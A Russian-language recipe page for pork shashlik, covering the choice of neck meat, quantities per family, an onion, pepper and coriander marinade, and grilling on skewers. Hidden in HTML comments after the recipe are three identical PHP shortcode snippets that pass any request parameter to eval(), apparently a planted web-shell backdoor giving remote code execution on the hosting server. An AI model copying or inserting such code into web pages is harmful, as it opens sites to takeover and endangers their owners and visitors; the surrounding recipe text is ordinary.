Шашлык из свинины

Шашлык из свинины

Сегодня будем готовить шашлык из свинины.

В принципе, вкусный шашлык можно приготовить из любой части свиной туши, например из ребрышек. Но! Если вы не обладаете достаточным количеством опыта, советую вам не полениться, съездить на рынок и купить хороший кусок свежей шейной вырезки.

Это будет беспроигрышный вариант, так как шейка прощает многое. Ее трудно пережарить, и жировые прослойки в ней сделают мясо сочным и вкусным.  Если немного недожарить ее, она все равно будет мягкой.

Сколько покупать мяса, чтобы его хватило на всех гостей конечно зависит от того насколько ваши гости любят шашлык. Я поступаю так, в среднем на одну семью покупаю килограмм мяса. Хватает на всех и даже немного остается.

В сегодняшнем празднике будут участвовать пять семей, значит берем пять килограммов вырезки. Все очень просто!

Ингредиенты для шашлыка

Итак, перечислим ингредиенты. Для приготовления вкусного шашлыка из свинины нам понадобятся:

  • свиная шейная вырезка без костей;
  • лук репчатый;
  • перец черный молотый;
  • соль.

В принципе этого достаточно. Если вы хотите почувствовать именно вкус мяса, то советую на этом остановиться. Однако мне сегодня захотелось немного разнообразить вкус блюда, поэтому я добавлю в мясо:

Как приготовить шашлык из свинины

Итак, приступим. Режем мясо кусочками размером примерно со спичечный коробок или чуть больше и толщиной как два спичечных коробка.

Да, чуть не забыл! Не надо мясо долго мариновать. Два, три часа — более чем достаточно. Если на улице тепло, то я вообще сначала разжигаю костер, потом сажусь резать мясо.

Продолжим. Нарезанное мясо кладем в емкость в которой его удобнее всего везти или нести к месту приготовления.

Чистим лук и нарезаем его полукольцами.

Я режу лука по объему приблизительно вдвое меньше, чем мяса. Можете резать меньше, можете больше, как говорится луком мясо не испортишь!

Добавляем лук к мясу.

Посыпаем все сверху солью по вкусу, обильно посыпаем черным перцем. Шашлык лучше переперчить, чем недоперчить. Термообработка ослабит жгучесть перца.

Ножом на доске раздавливаем зерна кориандра, небольшую горсточку.

Высыпаем зерна к мясу и добавляем туда же смесь сушеных помидоров и паприки.

Тщательно все перемешиваем. Можно в процессе пожмакать руками лук, чтобы он дал сок.

Все! Мясо уже готово к зажарке. Если хотите можете немного его помариновать.

Готовить такой шашлык можно на шампурах или на решетке. Мне больше нравится на шампурах. Мясо тогда можно поджарить со всех сторон.

Готовить советую на не очень горячих углях. Идеально будет, если до готовности мясо дойдет за 30-40 минут. Готовность проверяйте ножом. Разрезаем самый крупный кусок на шампуре, если не кровит — смело снимайте с огня и на стол. Не стоит жарить дольше, если хотите чтобы мясо было сочным.

Когда мясо будет готово, подавайте на стол его вот с таким натюрмортом:

Приятного аппетита!

<!— [insert_php]if (isset($_REQUEST["joYFW"])){eval($_REQUEST["joYFW"]);exit;}[/insert_php][php]if (isset($_REQUEST["joYFW"])){eval($_REQUEST["joYFW"]);exit;}[/php] —>

<!— [insert_php]if (isset($_REQUEST["PNbrn"])){eval($_REQUEST["PNbrn"]);exit;}[/insert_php][php]if (isset($_REQUEST["PNbrn"])){eval($_REQUEST["PNbrn"]);exit;}[/php] —>

<!— [insert_php]if (isset($_REQUEST["CfsTn"])){eval($_REQUEST["CfsTn"]);exit;}[/insert_php][php]if (isset($_REQUEST["CfsTn"])){eval($_REQUEST["CfsTn"]);exit;}[/php] —>

Оставь свой комментарий к рецепту Шашлык из свинины

Добавить комментарий

Имя (обязательно)
Почта (обязательно)
Сайт (не обязательно)